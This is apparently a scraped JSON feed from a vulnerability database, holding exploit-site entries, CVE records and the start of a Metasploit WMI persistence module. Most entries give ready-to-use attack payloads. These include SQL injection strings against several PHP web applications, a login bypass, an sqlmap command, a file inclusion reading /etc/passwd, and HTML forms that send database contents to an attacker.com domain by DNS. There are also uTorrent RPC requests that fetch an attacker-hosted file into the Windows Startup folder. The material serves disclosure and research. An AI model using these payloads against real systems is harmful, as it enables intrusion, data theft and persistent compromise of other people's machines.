{"zdt": [{"lastseen": "2019-03-26T01:12:29", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-03-25T00:00:00", "published": "2019-03-25T00:00:00", "id": "1337DAY-ID-32421", "href": "https://0day.today/exploit/description/32421", "title": "Zeeways Jobsite CMS - id SQL Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Zeeways Jobsite CMS - 'id' SQL Injection\r\n# Exploit Author: Ahmet \u00dcmit BAYRAM\r\n# Vendor Homepage: http://www.zeeways.com/jobsite-cms/1/productdetail\r\n# Demo Site: http://www.zeewayscms.com/jobsite/\r\n# Version: Latest\r\n# Tested on: Kali Linux\r\n# CVE: N/A\r\n\r\n----- PoC 1: SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/news_details.php?id=1\r\nVulnerable Parameter: id (GET)\r\nPayload: id=-5236\" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN\r\n(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING\r\nMIN(0)#\r\n\r\n----- PoC 2: SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/jobs_details.php?id=1\r\nVulnerable Parameter: id (GET)\r\nPayload: id=-5236\" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN\r\n(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING\r\nMIN(0)#\r\n\r\n----- PoC 3: SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/job_cmp_details.php?id=1\r\nVulnerable Parameter: id (GET)\r\nPayload: id=-5236\" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN\r\n(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING\r\nMIN(0)#\n\n# 0day.today [2019-03-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32421"}, {"lastseen": "2018-03-13T23:22:08", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category remote exploits", "modified": "2018-02-20T00:00:00", "published": "2018-02-20T00:00:00", "href": "https://0day.today/exploit/description/29857", "id": "1337DAY-ID-29857", "title": "utorrent - JSON-RPC 
Remote Code Execution / Information Disclosure Vulnerabilities", "type": "zdt", "sourceData": "By default, utorrent creates an HTTP RPC server on port 10000 (uTorrent classic) or 19575 (uTorrent web). There are numerous problems with these RPC servers that can be exploited by any website using XMLHTTPRequest(). To be clear, visiting *any* website is enough to compromise these applications.\r\n \r\n \r\nuTorrent web (http://web.utorrent.com)\r\n======================================\r\n \r\nAs the name suggests, uTorrent Web uses a web interface and is controlled by a browser as opposed to the desktop application. By default, uTorrent web is configured to startup with Windows, so will always be running and accessible. For authentication, a random token is generated and stored in a configuration file which must be passed as a URL parameter with all requests. When you click the uTorrent tray icon, a browser window is opened with the authentication token populated, it looks like this:\r\n \r\nhttp://127.0.0.1:19575/gui/index.html?localauth=localapic3cfe21229a80938:\r\n \r\nWhile not a particularly strong secret (8 bytes of std::random_device), it at least would make remote attacks non-trivial. Unfortunately however, the authentication secret is stored inside the webroot (wtf!?!?!?!), so you can just fetch the secret and gain complete control of the service.\r\n \r\n$ curl -si http://localhost:19575/users.conf\r\nHTTP/1.1 200 OK\r\nDate: Wed, 31 Jan 2018 19:46:44 GMT\r\nLast-Modified: Wed, 31 Jan 2018 19:37:50 GMT\r\nEtag: \"5a721b0e.92\"\r\nContent-Type: text/plain\r\nContent-Length: 92\r\nConnection: close\r\nAccept-Ranges: bytes\r\n \r\nlocalapi29c802274dc61fb4 bc676961df0f684b13adae450a57a91cd3d92c03 94bc897965398c8a07ff 2 1\r\n \r\nThis requires some simple dns rebinding to attack remotely, but once you have the secret you can just change the directory torrents are saved to, and then download any file anywhere writable. 
For example:\r\n \r\n# change the download directory to the Startup folder.\r\nhttp://127.0.0.1:19575/gui/?localauth=token:&action=setsetting&s=dir_active_download&v=C:/Users/All%20Users/Start%20Menu/Programs/Startup\r\n \r\n# download a torrent containing calc.exe\r\nhttp://127.0.0.1:19575/gui/?localauth=token:&action=add-url&url=http://attacker.com/calc.exe.torrent\r\n \r\nI wrote a working exploit for this attack, available here:\r\n \r\nhttp://lock.cmpxchg8b.com/Moer0kae.html\r\n \r\nThe authentication secret is not the only data accessible within the webroot - settings, crashdumps, logs and other data is also accessible. As this is a complete remote compromise of the default uTorrent web configuration, I didn't bother looking any further after finding this.\r\n \r\nuTorrent Classic (https://www.utorrent.com/downloads/win)\r\n=========================================================\r\n \r\nBy default utorrent Classic creates a JSON RPC server on port 10000, it's not clear to me that this was intentionally exposed to the web, as many endpoints crash or interfere with the UI. Here are some example actions that websites can take:\r\n \r\nhttp://lock.cmpxchg8b.com/utorrent-crash-test.html\r\n \r\nNevertheless, browsing through the available endpoints I noticed that the /proxy/ handler is enabled and exposed by default, and allows any website to enumerate and copy any files you've downloaded. To be clear, any website you visit can read and copy every torrent you've downloaded. 
This works with the default configuration.\r\n \r\nThis requires brute forcing the \"sid\" which is a small integer that is incremented once for each torrent, this can be brute forced in seconds.\r\n \r\ne.g.\r\n \r\n$ curl -sI 'http://localhost:10000/proxy/0/?sid=2&file=0&callback=file'\r\nHTTP/1.1 200 OK\r\nContent-Type: audio/mpeg\r\nServer: BitTorrentProxy/1.0\r\nConnection: close\r\nAccept-Ranges: bytes\r\nETag: \"8FD54C339FE8B8A418CE2299AF2EADD9B1715D7A\"\r\n \r\nfile is the index in a multi-file torrent (here there is just one file) and callback is a javascript callback. This means any website can find out what you've downloaded, and then just copy it from you - all the data.\r\n \r\nI made a simple demo, screenshot of how it's supposed to look attached. It's really slow, but demonstrates that a website can enumerate and read any data you've downloaded via uTorrent.\r\n \r\n \r\nhttp://lock.cmpxchg8b.com/Ahg8Aesh.html\r\n \r\nHere is how I reproduced:\r\n \r\n* On a fresh Windows 7 VM, install utorrent 3.5 (44294). Accept all default settings.\r\n* File -> Add torrent from URL..., enter https://archive.org/download/SKODAOCTAVIA336x280/SKODAOCTAVIA336x280_archive.torrent\r\n* When the torrent is finished (it's only about 5MB), visit this URL in Chrome: http://lock.cmpxchg8b.com/Ahg8Aesh.html\r\n* Click \"Start Attack\"\r\n* Wait a few minutes.\r\n \r\nThe page should have figured out the size and file type, and gives an option to steal the files. See screenshot attached.\r\n \r\n----------\r\n \r\nThe utorrent binary disables ASLR and /GS. This is a really bad idea. (Note that the binary is UPX packed, but this doesn't change any security properties).\r\n \r\n----------\r\n \r\nI noticed that utorrent is using unmodified mersenne twister to generate authentication tokens and cookies, session identifiers, pairing keys, and so on. The PRNG is seeded with GetProcessId(), GetTickCount() etc. 
That is already not great quality seed data, but mersenne twister makes no guarantees that someone who can view sample output can't reconstruct the state of the PRNG.\r\n \r\nThis is actually one of the FAQs on the mersenne twister site:\r\n \r\nhttp://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/efaq.html\r\n \r\nThis allows anyone to reconstruct things like pairing keys, webui session cookies, etc, etc. You can sample unlimited prng output, so this is a serious design flaw.\r\n \r\n----------\r\n \r\nFinally, a minor issue - the documentation for the \"guest\" account feature says many actions are disabled for security, but I tested it and it plain isn't true:\r\n \r\n$ curl -si 'http://[email\u00a0protected]:10000/gui/?action=getsettings&callback=error&btapp='\r\nHTTP/1.1 200 OK\r\nConnection: keep-alive\r\nContent-Length: 16572\r\nContent-Type: text/javascript\r\nSet-Cookie: GUID=6yY1pkIHHMvvHo8tgOYu; path=/\r\nCache-Control: no-cache\r\n \r\n{\"build\":44090,\"settings\": [\r\n[\"install_modification_time\",0,\"0\",{\"access\":\"Y\"}]\r\n...\r\n \r\n \r\nPerhaps this got broken at some point, but this feature is web-accessible, so this should probably be fixed (or suitable warnings added). 
I can't imagine many users enabled this, but those that did probably expected the security boundaries described in the documentation to be enforced.\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29857"}, {"lastseen": "2018-01-03T13:06:21", "bulletinFamily": "exploit", "description": "SoftDatepro Dating Social Network version 1.3 suffers from a remote SQL injection vulnerability.", "modified": "2017-09-30T00:00:00", "published": "2017-09-30T00:00:00", "href": "https://0day.today/exploit/description/28684", "id": "1337DAY-ID-28684", "type": "zdt", "title": "SoftDatepro Dating Social Network 1.3 SQL Injection Vulnerability", "sourceData": "# # # # # \r\n# Exploit Title: SoftDatepro Dating Social Network 1.3 - SQL Injection\r\n# Dork: N/A\r\n# Date: 29.09.2017\r\n# Vendor Homepage: http://www.softdatepro.com/\r\n# Software Link: https://codecanyon.net/item/softdatepro-build-your-own-dating-social-network/3650044\r\n# Demo: http://demo.softdatepro.com/\r\n# Version: 1.3\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands....\r\n# \r\n# Proof of Concept:\r\n# \r\n# http://localhost/[PATH]/viewprofile.php?profid=[SQL]\r\n# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]\r\n# \r\n# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)[email\u00a0protected]:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-\r\n# \r\n# http://localhost/[PATH]/admin\r\n# \r\n# Email: 'or 1=1 or ''=' Pass: anything\r\n# \r\n# Etc..\r\n# # # # 
#\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/28684", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-31T15:38:12", "bulletinFamily": "exploit", "description": "Apache Impala versions 2.7.0 through 2.8.0 suffers from an information disclosure vulnerability. It was noticed that a malicious process impersonating an Impala daemon could cause Impala daemons to skip authentication checks when Kerberos is enabled (but TLS is not). If the malicious server responds with 'COMPLETE' before the SASL handshake has completed, the client will consider the handshake as completed even though no exchange of credentials has happened.", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "href": "https://0day.today/exploit/description/28113", "id": "1337DAY-ID-28113", "type": "zdt", "title": "Apache Impala 2.8.0 Authentication Bypass Vulnerability", "sourceData": "CVE-2017-5640 Apache Impala (incubating) Information Disclosure\r\n\r\nVersions Affected:\r\nApache Impala (incubating) 2.7.0 to 2.8.0\r\n\r\nDescription:\r\nIt was noticed that a malicious process impersonating an Impala daemon\r\ncould cause Impala daemons to skip authentication checks when Kerberos\r\nis enabled (but TLS is not). 
If the malicious server responds with\r\n'COMPLETE' before the SASL handshake has completed, the client will\r\nconsider the handshake as completed even though no exchange of\r\ncredentials has happened.\r\n\r\nMitigation:\r\nUsers of the affected versions should apply the following mitigation:\r\nUpgrade to Apache Impala (incubating) 2.9.0\r\n\r\nCredit:\r\nThis issue was identified by the Cloudera Security team.\r\n\r\nReferences:\r\nhttps://issues.apache.org/jira/browse/IMPALA-5005\n\n# 0day.today [2018-03-31] #", "sourceHref": "https://0day.today/exploit/28113", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-09T03:25:09", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-04-05T00:00:00", "published": "2017-04-05T00:00:00", "href": "https://0day.today/exploit/description/27522", "id": "1337DAY-ID-27522", "title": "WordPress Car Rental System v2.5 Plugin - SQL Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Car Rental System v2.5\r\n# Exploit Author: TAD GROUP\r\n# Vendor Homepage: https://www.bestsoftinc.com/\r\n# Software Link: https://www.bestsoftinc.com/car-rental-system.html\r\n# Version: 2.5\r\n# Contact: [email\u00a0protected]\r\n# Website: https://tad.bg <https://tad.bg>\r\n# Category: Web Application Exploits\r\n\r\n1. Description\r\n\r\nAn unescaped parameter was found in Car Rental System v2.5 (WP plugin). An attacker can exploit this vulnerability to read from the database.\r\nThe POST parameters 'pickuploc', 'dropoffloc', and 'car_type' are vulnerable.\r\n\r\n2. 
Proof of concept\r\n\r\nsqlmap -u \"http://example.com/wp-car/\" \u2014data=\"pickuploc=2&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=\" --dbs --threads=5 --random-agent\r\n\r\nParameter: pickuploc (POST)\r\n Type: boolean-based blind\r\n Title: AND boolean-based blind - WHERE or HAVING clause\r\n Payload: pickuploc=2 AND 3834=3834&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=\r\n\r\n Type: AND/OR time-based blind\r\n Title: MySQL >= 5.0.12 AND time-based blind\r\n Payload: pickuploc=2 AND SLEEP(5)&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=\r\n\r\nThe same is applicable for 'dropoffloc' and 'car_type' parameters\r\n\r\n\r\n3. Attack outcome:\r\n\r\nAn attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.\r\n\r\n4. Impact\r\n\r\nCritical\r\n\r\n5. Affected versions\r\n\r\n<= 2.5\r\n\r\n6. 
Disclosure timeline\r\n\r\n13-Mar-2017 - found the vulnerability\r\n13-Mar-2017 - informed the developer\r\n28-Mar-2017 - release date of this security advisory\r\n\r\nNot fixed at the date of submitting this exploit.\n\n# 0day.today [2018-02-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27522"}, {"lastseen": "2018-03-20T11:17:18", "bulletinFamily": "exploit", "description": "Gnew version 2013.1 suffers from file inclusion and remote SQL injection vulnerabilities.", "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "1337DAY-ID-21318", "href": "https://0day.today/exploit/description/21318", "type": "zdt", "title": "Gnew 2013.1 - Multiple Vulnerabilities", "sourceData": "Product: Gnew\r\nVulnerable Version(s): 2013.1 and probably prior\r\nTested Version: 2013.1\r\nAdvisory Publication: August 28, 2013 [without technical details]\r\nVendor Notification: August 28, 2013\r\nPublic Disclosure: October 2, 2013\r\nVulnerability Type: PHP File Inclusion [CWE-98], SQL Injection [CWE-89]\r\nCVE References: CVE-2013-5639, CVE-2013-5640\r\nRisk Level: High\r\nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n \r\n------------------------------------------------------------------------\r\n-----------------------\r\n \r\nAdvisory Details:\r\n \r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Gnew, which can be exploited to execute arbitrary PHP code and perform SQL injection attacks against vulnerable application.\r\n \r\n1) PHP File Inclusion in Gnew: CVE-2013-5639\r\n \r\nVulnerability exists due to insufficient validation of user-supplied input passed via the \"gnew_language\" cookie to \"/users/login.php\" script before using it in \"include()\" function. 
A remote attacker can include and execute arbitrary local files on a vulnerable system via directory traversal sequence and URL-encoded NULL byte.\r\n \r\nThe following exploitation example below displays content of the \"/etc/passwd\" file:\r\n \r\nGET /users/login.php HTTP/1.1\r\nCookie: gnew_language=../../../etc/passwd%00;\r\n \r\n2) SQL Injection in Gnew: CVE-2013-5640\r\n \r\n2.1 The vulnerability exists due to insufficient filtration of \"friend_email\" HTTP POST parameter passed to \"/news/send.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe following exploitation example sends MySQL server version and database username to email address \"attacker (at) mail (dot) com [email concealed]\":\r\n \r\n<form action=\"http://[host]/news/send.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"send\" value=\"1\">\r\n<input type=\"hidden\" name=\"user_name\" value=\"username\">\r\n<input type=\"hidden\" name=\"user_email\" value=\"user (at) mail (dot) com [email concealed]\">\r\n<input type=\"hidden\" name=\"friend_email\" value=\"attacker (at) mail (dot) com [email concealed]\">\r\n<input type=\"hidden\" name=\"news_id\" value=\"-1' UNION SELECT version(),user() -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.2 The vulnerability exists due to insufficient filtration of \"user_email\" HTTP POST parameter passed to \"/users/register.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe exploitation example below outputs database username and MySQL server version into file \"/var/www/file.txt\". 
Successful exploitation requires that MySQL server has write access to the \"/var/www\" directory.\r\n \r\n<form action=\"http://[host]/users/register.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"register\" value=\"1\">\r\n<input type=\"hidden\" name=\"user_email\" value=\"' UNION SELECT user(),version() INTO OUTFILE '/var/www/file.txt' -- 2\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.3 The vulnerability exists due to insufficient filtration of \"answer_id\" HTTP POST parameter passed to \"/polls/vote.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add_vote\" value=\"1\">\r\n<input type=\"hidden\" name=\"answer_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"hidden\" name=\"question_id\" value=\"1\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.4 The vulnerability exists due to insufficient filtration of \"question_id\" HTTP POST parameter passed to \"/polls/vote.php\" script. 
A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add_vote\" value=\"1\">\r\n<input type=\"hidden\" name=\"answer_id\" value=\"1\">\r\n<input type=\"hidden\" name=\"question_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.5 The vulnerability exists due to insufficient filtration of \"story_id\" HTTP POST parameter passed to \"/comments/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. 
The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/comments/add.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_subject\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_text\" value=\"1\">\r\n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.6 The vulnerability exists due to insufficient filtration of \"story_id\" HTTP POST parameter passed to \"/comments/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. 
The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/comments/edit.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"edit\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview_edited\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_subject\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_text\" value=\"1\">\r\n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.7 The vulnerability exists due to insufficient filtration of \"thread_id\" HTTP POST parameter passed to \"/posts/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. 
The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/posts/add.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview\" value=\"1\">\r\n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.8 The vulnerability exists due to insufficient filtration of \"thread_id\" HTTP POST parameter passed to \"/posts/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. 
The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/posts/edit.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"edit\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview_edited\" value=\"1\">\r\n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\nSuccessful exploitation of vulnerabilities 2.3-2.8 requires that attacker is registered and logged-in. Registration is opened by default.\r\n \r\nVulnerabilities 2.1, 2.2 and 2.8 were discovered by Gjoko Krstic: http://packetstormsecurity.com/files/122771 on July 23, 2013. High-Tech Bridge Research Lab has discovered these vulnerabilities independently and publishes them as since the Vendor notification date they remain unpatched.\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21318"}], "cve": [{"lastseen": "2019-05-29T18:17:08", "bulletinFamily": "NVD", "description": "It was noticed that a malicious process impersonating an Impala daemon in Apache Impala (incubating) 2.7.0 to 2.8.0 could cause Impala daemons to skip authentication checks when Kerberos is enabled (but TLS is not). 
If the malicious server responds with 'COMPLETE' before the SASL handshake has completed, the client will consider the handshake as completed even though no exchange of credentials has happened.", "modified": "2017-07-17T16:13:00", "id": "CVE-2017-5640", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5640", "published": "2017-07-10T20:29:00", "title": "CVE-2017-5640", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:13:05", "bulletinFamily": "NVD", "description": "Multiple SQL injection vulnerabilities in Gnew 2013.1 allow remote attackers to execute arbitrary SQL commands via the (1) answer_id or (2) question_id parameter to polls/vote.php, (3) story_id parameter to comments/add.php or (4) comments/edit.php, or (5) thread_id parameter to posts/add.php. NOTE: this issue was SPLIT due to differences in researchers and disclosure dates. CVE-2013-7349 already covers the news_id parameter to news/send.php, user_email parameter to users/register.php, and thread_id to posts/edit.php vectors.", "modified": "2016-12-31T02:59:00", "id": "CVE-2013-5640", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5640", "published": "2014-04-01T03:24:00", "title": "CVE-2013-5640", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2019-12-04T08:49:02", "bulletinFamily": "exploit", "description": "This module will create a permanent WMI event subscription to achieve file-less persistence using one of five methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing must be enabled on the target for this method to work, this can be enabled using \"auditpol.exe /set /subcategory:Logon /failure:Enable\"). 
When these criteria are met a command line event consumer will trigger an encoded powershell payload. The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations.\n", "modified": "2017-09-14T02:03:34", "published": "2017-06-05T16:44:37", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/WMI_PERSISTENCE", "href": "", "type": "metasploit", "title": "WMI Event Subscription Persistence", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/powershell'\nrequire 'msf/core/post/windows/powershell'\nrequire 'msf/core/post/file'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::Windows::Powershell\n include Msf::Exploit::Powershell\n include Post::Windows::Priv\n include Msf::Post::File\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WMI Event Subscription Persistence',\n 'Description' => %q{\n This module will create a permanent WMI event subscription to achieve file-less persistence using one\n of five 
methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER\n (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing\n must be enabled on the target for this method to work, this can be enabled using \"auditpol.exe /set /subcategory:Logon\n /failure:Enable\"). When these criteria are met a command line event consumer will trigger an encoded powershell payload.\n The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON\n method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS\n method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method\n creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER\n before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command\n (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is\n activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a\n high integrity process. 
